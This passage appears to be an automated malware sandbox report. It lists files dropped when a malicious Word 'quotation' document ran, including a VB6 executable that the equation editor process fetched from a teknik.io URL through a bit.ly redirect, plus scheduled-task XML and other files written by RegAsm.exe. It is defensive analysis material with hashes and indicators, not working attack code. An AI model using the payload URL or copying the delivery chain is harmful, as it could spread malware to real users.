SSDEEP:	24:hBntmDvKUQQDvKUr7C5fpqp8gPvXHmXvponXux:3ntmD5QQD5XC5RqHHXmXvp++x
MD5:	D4AE187B4574036C2D76B6DF8A8C1A30
SHA1:	B06F409FA14BAB33CBAF4A37811B8740B624D9E5
SHA-256:	A2CE3A0FA7D2A833D1801E01EC48E35B70D84F3467CC9F8FAB370386E13879C7
SHA-512:	1F44A360E8BB8ADA22BC5BFE001F1BABB4E72005A46BC2A94C33C4BD149FF256CCE6F35D65CA4F7FC2A5B9E15494155449830D2809C8CF218D0B9196EC646B0C
Malicious:	false
Reputation:	high, very likely benign file
Preview:	0..y...H.........j0..f...1.0....H.........N0..J0..2.......D....'..09...@k0....H........0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30...000930211219Z..210930140115Z0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30.."0....H.............0..........P..W..be......,k0.[...}.@......3vI.?!I..N..>H.e...!.e..2....w..{........s.z..2..~..0....8.y.1.P..e.Qc...a.Ka..Rk...K.(.H......>.... .[.....p....%.tr.{j.4.0...h.{T....Z...=d.....Ap..r.&.8U9C....\@........%.......:..n.>..\..<.i.....)W..=....]......B0@0...U.......0....0...U...........0...U.........{,q...K.u...`...0....H...............,...\...(f7:...?K.... ]..YD.>.>..K.t.....t..~.....K. D....}..j.....N..:.pI...........:^H...X._..Z.....Y..n......f3.Y[...sG.+..7H..VK....r2...D.SrmC.&H.Rg.X..gvqx...V..9$1....Z0G..P.......dc`........}...=2.e..\|.Wv..(9..e...w.j..w.......)...55.1.

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	data
Category:	dropped
Size (bytes):	328
Entropy (8bit):	3.080958610796429
Encrypted:	false
SSDEEP:	6:kKLKEbqoN+SkQlPlEGYRMY9z+4KlDA3RUeKlF+adAlf:jM3kPlE99SNxAhUeo+aKt
MD5:	AD9008ACF5082FA8EB71D2E8C5BD9B96
SHA1:	11394AD7642601A83B356A265AC805C5E28A27AC
SHA-256:	4EE9FB4CE3E871D63A19C36B13F3AD281EB17EEAE99A9C13EC45CCC220B6DBCB
SHA-512:	B44C0F7E414E3405AA0DF081E723086E5FB08A622DF2BCDCEEBCC19C77C97D3946A7FB7D7EC34DF1DED51A28EDDA3432B2D206053A89BF5E5431E29974642B12
Malicious:	false
Preview:	p...... ........b.......(....................................................... ..................&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.e.b.b.a.e.1.d.7.e.a.d.6.1.:.0."...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	data
Category:	dropped
Size (bytes):	252
Entropy (8bit):	3.0294634724686764
Encrypted:	false
SSDEEP:	3:kkFklA9M1fllXlE/QhzllPlzRkwWBARLNDU+ZMlKlBkvclcMlVHblB1UAYpFit:kK5QliBAIdQZV7eAYLit
MD5:	030E777529B43E0D9FED41EFFE564B26
SHA1:	80E57C39FC84DC03AFC464FF6E0E9D66239F1BD3
SHA-256:	88ABA1A4879A359E121690E3BBC990017F6C45ABBA1EB0FDAF3DFAAD07A5BE61
SHA-512:	75E8FEA934E26617B9E933794507CF9FA2ADD1AFF10000D35652F468742F4B4AE2B33A1447138A70BA9F9045F84C31E63E38D59CDAC4BB2B9C0C80FFEC12BB2C
Malicious:	false
Preview:	p...... ....`....SJ.....(....................................................... ........u.........(...........}...h.t.t.p.:././.a.p.p.s...i.d.e.n.t.r.u.s.t...c.o.m./.r.o.o.t.s./.d.s.t.r.o.o.t.c.a.x.3...p.7.c...".3.7.d.-.5.9.e.7.6.b.3.c.6.4.b.c.0."...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\wREzo[1].txt Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	downloaded
Size (bytes):	131072
Entropy (8bit):	4.856871861209239
Encrypted:	false
SSDEEP:	3072:6wVUP1A3a64iOR/VfgmLQPDBZByQqFXrMQqwV:6wVUPH6GfgmLQPDBZByQqFXIQqwV
MD5:	A6AD1C3046A3CF0C6992507F2886AAB3
SHA1:	8024E4315C4BD196F1531E08C541359DBAC70A39
SHA-256:	CEF944407A26C3C148AFBF8253BAA55AEE7CDFAEC17B5A158831574245BAC8AD
SHA-512:	A5C0796BCCE3CEDE14CC02915A4A0A55AEEAFD0B0675AF8FE395905F9ED78A58CBDCED5EE89CFBDD7E55B90A5AED2D647C76EE3BB9DD35E778DA19680768F21A
Malicious:	true
Antivirus:	Antivirus: Virustotal, Detection: 42%, Browse Antivirus: ReversingLabs, Detection: 28%
IE Cache URL:	https://u.teknik.io/wREzo.txt
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u...1...1...1.....0...~..0......0...Rich1...........PE..L.....Y.................P...................`....@.........................................................................tY..(....p.....................................................................(... ....................................text....M.......P.................. ..`.data........`.......`..............@....rsrc.......p.......p..............@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\2ZKf4aq[1].htm Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	HTML document, ASCII text
Category:	dropped
Size (bytes):	116
Entropy (8bit):	4.572661742712173
Encrypted:	false
SSDEEP:	3:qVvzLURODccZ/vXbvx9nDyZHL+E8IkFSXbKFvNGb:qFzLIeco3XLx92ZHqHIMSLWQb
MD5:	64D298FA5892D258CB4465CD14478454
SHA1:	0BBAEB8DBA81A7861C1AAFBAB629538937594658
SHA-256:	89007ADC49FABF9602747C7FA654CC9174D9FE25FD1CBF9DBA800329AAEBF36B
SHA-512:	C717A6A0C3811DC77B485D9D70159EE277970D213F456BC6F79FA0910E249BEC845E61CA24B6F48A73EEE15130743C27781A35610C945018BBC9B81BC9A1AC4A
Malicious:	false
Preview:	<html>.<head><title>Bitly</title></head>.<body><a href="https://u.teknik.io/wREzo.txt">moved here</a></body>.</html>

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{0863C5D3-5908-4917-8F28-8909E0160183}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1834894
Entropy (8bit):	4.020416000417094
Encrypted:	false
SSDEEP:	12288:DoINuEINuEINuEINuVINuEwNuEINueINuEINuEINuEINtEINuEINuEINuEINuEIX:k
MD5:	BCAEE394FB7661B22A808356CABD3615
SHA1:	E9252AC0D9998D3E8EAB95CF0153A29852A756A4
SHA-256:	1D0BF7198BD288E1276088B92D41C342A575DA7C2AB9085BF47A3A5C6843D175
SHA-512:	84EF925747D34DFEDFCE70B97A2FE525FBF5FD844B3368395FE9773E282AB561ACAA755D519ACE34A3CDDD402FD29B6696CCD161C6869573FB7BCF5A1AE1ACE6
Malicious:	false
Preview:	..@.m.4.2.J.E.U.a.4.S.r.c.l.Z.j.j.E.@.-.K.I.2.W.T.Y.r.C.C.I.Y.w.a.u.Z.0.C.<.e.h.&.&.7._.M.-.C._.D.-.-._.-.V.,.6.4.>.8.8.9.6.4.$.C.v.>.y.t.=.n.6.\|.:.%._.>.j.n.8.%.b.m.;.=.u...1.4..... . . . . . . . . . . . . . . . . . . . ......... . . . . . . . . . . . . . . . . . . . . ............. . . . . . . . . . . . . . . . ..... . . . . . . . . . . . . . . . . . . . ......... . . . . . . . . . . . . . . . . . . . . ............. . . . . . . . . . . . . . . . ..... . . . . . . . . . . . . . . . . . . . ......... . . . . . . . . . . . . . . . . . . . . ............. . . . . . . . . . . . . . . . ..... . . . . . . . . . . . . . . . . . . . ......... . . . . . . . . . . . . . . . . . . . . ............. . . . . . . . . . . . . . . . ..... . . . . . . . . . . . . . . . . . . . ......... . . . . . . . . . . . . . . . . . . . . ............. . . . . . . . . . . . . . . . ..... . . . . . . . . . . . . . . . . . . . ......... . . . . . . . . . . . . . . . . . . . . ............. . . . . . . . . . . . . .

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{24864F90-30CA-4646-ACFF-79FC9E14ADCB}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
SSDEEP:	3:ol3lYdn:4Wn
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{C2D3EB9C-AB70-4784-8852-5C03B64EE05D}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1536
Entropy (8bit):	1.3568273340340575
Encrypted:	false
SSDEEP:	3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbQ:IiiiiiiiiifdLloZQc8++lsJe1Mzb
MD5:	C990C02C26800951CBF8B0581C7AAC39
SHA1:	9768AA8776819BD7E836740634B596D46FFA8303
SHA-256:	0DDDB3264217F403F4D0D5791562DDA835E42E9592B1BCE42E6F1076F31F7AC3
SHA-512:	CC236BE11D2BAB46160A6AE3C01168B6B92A2DD5A77E027D561E00B5A5A617045008E975C6E54D73D3E6BFF5B7B499AFD560FDEFCA7B1FBCCBFB95436BE022B2
Malicious:	false
Preview:	..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\CabBF0C.tmp Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	Microsoft Cabinet archive data, 59134 bytes, 1 file
Category:	dropped
Size (bytes):	59134
Entropy (8bit):	7.995450161616763
Encrypted:	true
SSDEEP:	1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
MD5:	E92176B0889CC1BB97114BEB2F3C1728
SHA1:	AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
SHA-256:	58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
SHA-512:	CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
Malicious:	false
Preview:	MSCF............,...................I........T.........R.. .authroot.stl.ym&7.5..CK..8T....c_.d...:.(.....].M$[v.4.).E.$7I.....e..Y..Rq...3.n..u..............\|..=H....&..1.1..f.L..>e.6....F8.X.b.1$,.a...n-......D..a....[.....i,+.+..<.b._#...G..U.....n..21pa..>.32..Y..j...;Ay........n/R... ._.+..<...Am.t.<. ..V..y`.yO..e@../...<#..#......dju..B......8..H'..lr.....l.I6/..d.].xIX<...&U...GD..Mn.y&.[<(tk.....%B.b;./..`.#h....C.P...B..8d.F...D.k........... 0..w...@(.. @K....?.)ce........\.\......l......Q.Qd..+...@.X..##3..M.d..n6.....p1..)...x0V...ZK.{...{.=#h.v.).....b.....[...L..c..a..,...E5X..i.d..w.....#o+.........X.P...k...V.$...X.r.e....9E.x..=\...Km.......B...Ep...xl@@c1.....p?...d.{EYN.K.X>D3..Z..q.] .Mq.........L.n}........+/l\.cDB0.'.Y...r.[.........vM...o.=....zK..r..l..>B....U..3....Z...ZjS...wZ.M...IW;..e.L...zC.wBtQ..&.Z.Fv+..G9.8..!..\T:K`......m.........9T.u..3h.....{...d[...@...Q.?..p.e.t[.%7..........^.....s.

C:\Users\user\AppData\Local\Temp\TarBF0D.tmp Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	data
Category:	dropped
Size (bytes):	152788
Entropy (8bit):	6.316654432555028
Encrypted:	false
SSDEEP:	1536:WIA6c7RbAh/E9nF2hspNuc8odv+1//FnzAYtYyjCQxSMnl3xlUwg:WAmfF3pNuc7v+ltjCQSMnnSx
MD5:	64FEDADE4387A8B92C120B21EC61E394
SHA1:	15A2673209A41CCA2BC3ADE90537FE676010A962
SHA-256:	BB899286BE1709A14630DC5ED80B588FDD872DB361678D3105B0ACE0D1EA6745
SHA-512:	655458CB108034E46BCE5C4A68977DCBF77E20F4985DC46F127ECBDE09D6364FE308F3D70295BA305667A027AD12C952B7A32391EFE4BD5400AF2F4D0D830875
Malicious:	false
Preview:	0..T....H.........T.0..T....1.0...`.H.e......0..D...+.....7.....D.0..D.0...+.....7..........R19%..210115004237Z0...+......0..D.0.......`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o

C:\Users\user\AppData\Local\Temp\tmp80F5.tmp Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1310
Entropy (8bit):	5.1063907901076036
Encrypted:	false
SSDEEP:	24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK0Rl4xtn:cbk4oL600QydbQxIYODOLedq3Sl4j
MD5:	CFAE5A3B7D8AA9653FE2512578A0D23A
SHA1:	A91A2F8DAEF114F89038925ADA6784646A0A5B12
SHA-256:	2AB741415F193A2A9134EAC48A2310899D18EFB5E61C3E81C35140A7EFEA30FA
SHA-512:	9DFD7ECA6924AE2785CE826A447B6CE6D043C552FBD3B8A804CE6722B07A74900E703DC56CD4443CAE9AB9601F21A6068E29771E48497A9AE434096A11814E84
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak

C:\Users\user\AppData\Local\Temp\tmp9445.tmp Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1319
Entropy (8bit):	5.133606110275315
Encrypted:	false
SSDEEP:	24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK0mne5xtn:cbk4oL600QydbQxIYODOLedq3Ze5j
MD5:	C6F0625BF4C1CDFB699980C9243D3B22
SHA1:	43DE1FE580576935516327F17B5DA0C656C72851
SHA-256:	8DFC4E937F0B2374E3CED25FCE344B0731CF44B8854625B318D50ECE2DA8F576
SHA-512:	9EF2DBD4142AD0E1E6006929376ECB8011E7FFC801EE2101E906787D70325AD82752DF65839DE9972391FA52E1E5974EC1A5C7465A88AA56257633EBB7D70969
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak

C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\catalog.dat Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
File Type:	data
Category:	dropped
Size (bytes):	928
Entropy (8bit):	7.024371743172393
Encrypted:	false
SSDEEP:	24:IQnybgCUtvd7xCFhwUuQnybgCUtvd7xCFhwUuQnybgCUtvd7xCFhwUuQnybgCUtw:Ik/lCrwfk/lCrwfk/lCrwfk/lCrw8
MD5:	CCB690520E68EE385ACC0ACFE759AFFC
SHA1:	33F0DA3F55E5B3C5AC19B61D31471CB60BCD5C96
SHA-256:	166154225DAB5FCB79C1CA97D371B159D37B83FBC0ADABCD8EBA98FA113A7A3B
SHA-512:	AC4F3CF1F8F460745D37E6350861C2FBCDDCC1BBDE0A48FB361BFBF5B1EBF10A05F798A72CE413FCA073FF8108955353DDBCBD9D50CED6CDAE231C67A28FDDA3
Malicious:	false
Preview:	Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.....@.3..{...grv+V...B.......].P...W.4C}uL.....s~..F...}......E......E...6E.....{...{.yS...7..".hK.!.x.2..i..zJ... ....f..?._....0.:e[7w{1.!.4.....&.Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.....@.3..{...grv+V...B.......].P...W.4C}uL.....s~..F...}......E......E...6E.....{...{.yS...7..".hK.!.x.2..i..zJ... ....f..?._....0.:e[7w{1.!.4.....&.Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.....@.3..{...grv+V...B.......].P...W.4C}uL.....s~..F...}......E......E...6E.....{...{.yS...7..".hK.!.x.2..i..zJ... ....f..?._....0.:e[7w{1.!.4.....&.Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.....@.3..{...grv+V...B.......].P...W.4C}uL.....s~..F...}......E......E...6E.....{...{.yS...7..".hK.!.x.2..i..zJ... ....f..?._....0.:e[7w{1.!.4.....&.

C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
File Type:	data
Category:	dropped
Size (bytes):	8
Entropy (8bit):	3.0
Encrypted:	false
SSDEEP:	3:xt:r
MD5:	3ABB7239389DBB84935EC98902664658
SHA1:	85EF47D1F243C052DA1C993B9A5F0D953AEB04EE
SHA-256:	C56B2DE67DFEBED5A8C2EAEC31498AD5E2AC6586A6C15EA6E82AB708FE8EBFC7
SHA-512:	BA77692928043D117C69ABCB3ADEE4F90E23AF8F30FEA996E3746F4971EEB030DBED26F535EEA1AF377E7DCB83911E977C0490C9C6923EC27BB025AD4B988FB6
Malicious:	true
Preview:	..x....H

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\QUOTATIONs44888_A2221_TOAN_TAN_LOC_TRADING_SERVICES_JOINT_STOCKs.LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:13 2020, mtime=Wed Aug 26 14:08:13 2020, atime=Thu Feb 25 14:28:30 2021, length=967360, window=hide
Category:	dropped
Size (bytes):	2568
Entropy (8bit):	4.577226214280601
Encrypted:	false
SSDEEP:	48:8QQY/XT3IkMbi1c42IQh2QQY/XT3IkMbi1c42IQ/:8QQY/XLIkMzpIQh2QQY/XLIkMzpIQ/
MD5:	2FF98281FD0929741EEB9C54BF54DB9B
SHA1:	C7F911DBA118EE784BB739A68E8F3798C8CB8A71
SHA-256:	7A1350716802EDF98667519C211D93E8B01CBA0016E0988EB36016D93F20F795
SHA-512:	5494D271B997819243119463B6DB88DC2F1D6E7EB9CD4F990B200116643DF201C6C39ADD17CA552C7A080F3617DE03CD28AED54293CDDC929C7929E3A6BE4E7E
Malicious:	false
Preview:	L..................F.... ...u....{..u....{..ym.............................;....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.....YR.{ .QUOTAT~1.DOC..........Q.y.Q.y...8.....................Q.U.O.T.A.T.I.O.N.s.4.4.8.8.8._.A.2.2.2.1._.T.O.A.N._.T.A.N._.L.O.C._.T.R.A.D.I.N.G._.S.E.R.V.I.C.E.S._.J.O.I.N.T._.S.T.O.C.K.s...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\936905\Users.user\Desktop\QUOTATIONs44888_A2221_TOAN_TAN_LOC_TRADING_SERVICES_JOINT_STOCKs.doc.[.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.Q.U.O.T.A.T.I.O.N.s.4.4.8.8.8._.A.2.2.2.1._.T.O.A.N._.T.A.N._.L.O.C._.T.R.A.D.I.N.G._.S.E.R.V.I.C.E.S._.J.O.I.N.T._.S.T.O.C.K.s..

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	230
Entropy (8bit):	4.619567959906291
Encrypted:	false
SSDEEP:	6:M7qjk8A2zDKnKqjk8A2zDKjqjk8A2zDKs:Md87anY87aV87as
MD5:	8164887DD336F403637A7B7C1135A1DA
SHA1:	0D2E021E54D11E130E87026854D6D8367BC65052
SHA-256:	8617F63E83B01A5499DAB372DFB16503950187DFD4C82A4485F137476564F204
SHA-512:	9E8A0BCB48782714F3DE01F8482DB2B913DB7213334353C4A2B43B0B12AD5D56BEF8756A42746CA1537CFD56DEEE7A5ACCC1D56E22B8CE44A7DF0EE02D8F9AF6
Malicious:	false
Preview:	[doc]..QUOTATIONs44888_A2221_TOAN_TAN_LOC_TRADING_SERVICES_JOINT_STOCKs.LNK=0..QUOTATIONs44888_A2221_TOAN_TAN_LOC_TRADING_SERVICES_JOINT_STOCKs.LNK=0..[doc]..QUOTATIONs44888_A2221_TOAN_TAN_LOC_TRADING_SERVICES_JOINT_STOCKs.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.431160061181642
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyzALORwObGUXKbylln:vdsCkWtJLObyvb+l
MD5:	6AF5EAEBE6C935D9A5422D99EEE6BEF0
SHA1:	6FE25A65D5CC0D4F989A1D79DF5CE1D225D790EC
SHA-256:	CE916A38A653231ED84153C323027AC4A0695E0A7FB7CC042385C96FA6CB4719
SHA-512:	B2F51A8375748037E709D75C038B48C69E0F02D2CF772FF355D7203EE885B5DB9D1E15DA2EDB1C1E2156A092F315EB9C069B654AF39B7F4ACD3EFEFF1F8CAEB0
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p.........^...............^.............P.^..............^.....z.........^.....x...

C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Little-endian UTF-16 Unicode text, with no line terminators
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:Qn:Qn
MD5:	F3B25701FE362EC84616A93A45CE9998
SHA1:	D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
SHA-256:	B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
SHA-512:	98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
Malicious:	false
Preview:	..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\LIP8714C.txt Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	64
Entropy (8bit):	4.030028124459133
Encrypted:	false
SSDEEP:	3:vpqMLJUQ2ciiZ/YXvWVt2X:vEMWXcijWVM
MD5:	25EDED50548FE4FFF3119179E391DD16
SHA1:	73D001FDD077A3066DB93CC0EF438BC51D2C20F0
SHA-256:	2CDCAB99426A62F6722A1704DE32D7B9BB8925A45B767D0934A1365A1578B1F1
SHA-512:	D85614C03EC7E9636E32AC05386752A76B2B330742DB6F6BC3A68EB566B94CE77ABA70E6A737E0EFAAADCE832289C4D623488DCA099765AF710ADA0077935300
Malicious:	false
IE Cache URL:	live.com/
Preview:	wla42..live.com/.1536.4124483072.30871743.3006855612.30870411.*.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\Y5D8BEZV.txt Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	ASCII text
Category:	downloaded
Size (bytes):	89
Entropy (8bit):	4.3519817792342295
Encrypted:	false
SSDEEP:	3:jviOdjc3SQBI6LJci2JQdYVO2O2LGWTW3SVy2X:uOdg3SQI69ci2J53OyTXf
MD5:	BE6FA4005BF612690EEE1ECDD31EE976
SHA1:	883ACE9B58936BEE7163C278302FDD324127848A
SHA-256:	A05E2DC449119D274ED9B43B253ACD75E696BCE9AD895B8D8393B538560A28B1
SHA-512:	DC1C24E681E21D645F5CD3BE083F27DC4E4C9CC275BBD51A3D8B6205FC46EBD63DF0DC7857A16665BD82CFBF234DFBC56B48CCC57ABA89A59E7367D6F078584C
Malicious:	false
IE Cache URL:	bit.ly/
Preview:	_bit.l1p6te-b37a8979adaf075f5e-00T.bit.ly/.1536.1532647680.30906545.667713608.30870411.*.

C:\Users\user\Desktop\~$OTATIONs44888_A2221_TOAN_TAN_LOC_TRADING_SERVICES_JOINT_STOCKs.doc Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.431160061181642
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyzALORwObGUXKbylln:vdsCkWtJLObyvb+l
MD5:	6AF5EAEBE6C935D9A5422D99EEE6BEF0
SHA1:	6FE25A65D5CC0D4F989A1D79DF5CE1D225D790EC
SHA-256:	CE916A38A653231ED84153C323027AC4A0695E0A7FB7CC042385C96FA6CB4719
SHA-512:	B2F51A8375748037E709D75C038B48C69E0F02D2CF772FF355D7203EE885B5DB9D1E15DA2EDB1C1E2156A092F315EB9C069B654AF39B7F4ACD3EFEFF1F8CAEB0
Malicious:	false
